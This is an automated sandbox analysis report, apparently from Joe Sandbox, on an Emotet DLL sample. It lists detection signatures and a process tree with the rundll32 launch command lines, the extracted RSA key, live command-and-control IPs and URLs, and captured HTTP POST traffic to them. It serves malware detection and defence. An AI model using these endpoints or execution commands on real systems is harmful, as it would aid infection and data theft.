Edit tour

Windows Analysis Report
sample

Overview

General Information

Sample Name:	sample (renamed file extension from none to dll)
Analysis ID:	676610
MD5:	8d925c0da257436438893e6fe7ce2f4f
SHA1:	c0ff465eb0b6ccc0f3a36bb593ced7453736a750
SHA256:	16488a25bf5ef3bb38f176f1843bfabfc4a3d0beec81f4ac0410cf7856bc777c
Tags:	dll
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Query firmware table information (likely to detect VMs)

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for sample

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5836 cmdline: loaddll32.exe "C:\Users\user\Desktop\sample.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 3116 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\sample.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5828 cmdline: rundll32.exe "C:\Users\user\Desktop\sample.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5660 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba",iNIZBi MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2776 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ttwabgporcdt\yyxjoravwnz.pba",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 344 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 1108 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4772 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 260 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2788 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 5232 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5652 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4368 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 2948 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 1248 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.335758052.0000000000A10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.767352719.0000000004760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.332283199.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.331704119.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.331683572.0000000000580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.341884681.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.335476233.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.332269283.0000000000580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.332361997.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.766565506.0000000000D60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.767779490.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.337892892.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.341860463.0000000000580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.331772344.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.360786510.0000000002E20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.360804490.0000000002E40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.360909118.0000000010000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.2e20000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.580000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.580000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.d60000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.4760000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.5a0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2e40000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.10000000.5.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.580000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2e40000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.580000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.5a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.10000000.5.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.a10000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.580000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.5a0000.4.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.4760000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.580000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.5a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.d60000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.5a0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.9f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.a10000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.rundll32.exe.9f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.5a0000.4.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2e20000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 31 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: sample.dll	Virustotal: Detection: 80%	Perma Link
Source: sample.dll	Metadefender: Detection: 70%	Perma Link
Source: sample.dll	ReversingLabs: Detection: 85%

Antivirus / Scanner detection for submitted sample

Source: sample.dll

Avira: detected

Antivirus detection for URL or domain

Source: https://157.245.145.87:443/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/	Avira URL Cloud: Label: malware
Source: https://163.53.204.180:443/8vl90912xxgd2/vzcu9no9/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: sample.dll

Joe Sandbox ML: detected

Source: 2.2.rundll32.exe.10000000.2.raw.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Source: sample.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source:

Binary string: WaaSMedicSvc.pdb source: waasmedic.20220801_204255_503.etl.15.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.202.10.123 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 203.157.152.9 7080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.93.3.85 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 172.96.190.154 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 109.99.146.210 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.107.118.125 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 163.53.204.180 443	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 157.245.145.87 443	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.55.186.229 80	Jump to behavior

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: MOPH-TH-APInformationTechnologyOfficeSG MOPH-TH-APInformationTechnologyOfficeSG

Source: Joe Sandbox View	IP Address: 116.202.10.123 116.202.10.123
Source: Joe Sandbox View	IP Address: 203.157.152.9 203.157.152.9

Source: global traffic	HTTP traffic detected: POST /mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/ HTTP/1.1DNT: 0Referer: 157.245.145.87/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/Content-Type: multipart/form-data; boundary=-----------------------mlpYKhZmEPpzkygQscIgNsfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 157.245.145.87:443Content-Length: 5636Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8vl90912xxgd2/vzcu9no9/ HTTP/1.1DNT: 0Referer: 163.53.204.180/8vl90912xxgd2/vzcu9no9/Content-Type: multipart/form-data; boundary=---------------57LyBAPiCcL27kGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 163.53.204.180:443Content-Length: 5604Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	TCP traffic: 192.168.2.3:49759 -> 203.157.152.9:7080
Source: global traffic	TCP traffic: 192.168.2.3:49769 -> 109.99.146.210:8080
Source: global traffic	TCP traffic: 192.168.2.3:49800 -> 116.202.10.123:8080
Source: global traffic	TCP traffic: 192.168.2.3:49834 -> 91.93.3.85:8080

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown	TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown	TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown	TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown	TCP traffic detected without corresponding DNS query: 109.99.146.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.99.146.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.99.146.210
Source: unknown	TCP traffic detected without corresponding DNS query: 172.96.190.154
Source: unknown	TCP traffic detected without corresponding DNS query: 172.96.190.154
Source: unknown	TCP traffic detected without corresponding DNS query: 172.96.190.154
Source: unknown	TCP traffic detected without corresponding DNS query: 163.53.204.180
Source: unknown	TCP traffic detected without corresponding DNS query: 163.53.204.180
Source: unknown	TCP traffic detected without corresponding DNS query: 163.53.204.180
Source: unknown	TCP traffic detected without corresponding DNS query: 163.53.204.180
Source: unknown	TCP traffic detected without corresponding DNS query: 190.107.118.125
Source: unknown	TCP traffic detected without corresponding DNS query: 190.107.118.125
Source: unknown	TCP traffic detected without corresponding DNS query: 190.107.118.125
Source: unknown	TCP traffic detected without corresponding DNS query: 91.93.3.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.93.3.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.93.3.85

Source: svchost.exe, 0000001D.00000003.601222363.000001B27DF79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001D.00000003.601222363.000001B27DF79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001D.00000003.601254264.000001B27DF8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.601222363.000001B27DF79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-22T07:55:01.8237416Z\|\|.\|\|b7e2ac48-308b-4ab0-ad70-c01dd95863e0\|\|1152921505695074449\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000001D.00000003.601254264.000001B27DF8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.601222363.000001B27DF79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"Revi